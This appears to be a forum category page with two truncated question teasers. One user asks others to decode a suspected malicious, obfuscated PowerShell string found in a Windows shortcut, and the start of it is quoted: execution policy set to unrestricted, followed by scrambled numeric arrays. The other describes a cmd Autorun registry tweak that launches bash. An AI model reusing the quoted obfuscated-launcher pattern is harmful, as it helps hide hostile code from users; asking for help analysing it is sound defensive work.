Category : shell

I came across this string embedded within a Windows shortcut. I’m under the impression that this may be malicious or adversarial in nature. I do not have any knowledge with PowerShell, could anyone perhaps decipher this incantation, or point me to related resources? C:WINDOWSSystem32WindowsPowerShellv1.0powershell.exe -ExecutionPolicy UnRestricted function QC($wHV) {$Z = $Null;$rzh = @(2037,2099,2101,2098);$IQH = $Null;$BEwI ..

Read more

I am using windows 10 and recently edited registry of command prompt.. my registry :– key path — ComputerHKEY_CURRENT_USERSOFTWAREMicrosoftCommand Processor data — Autorun value — %SystemRoot%bashrc.cmd I added autorun data to run a script on cmd startup which is like this bashrc.cmd @echo off cls "C:cygwinbinbash.exe" So now when i open command prompt bash will ..

Read more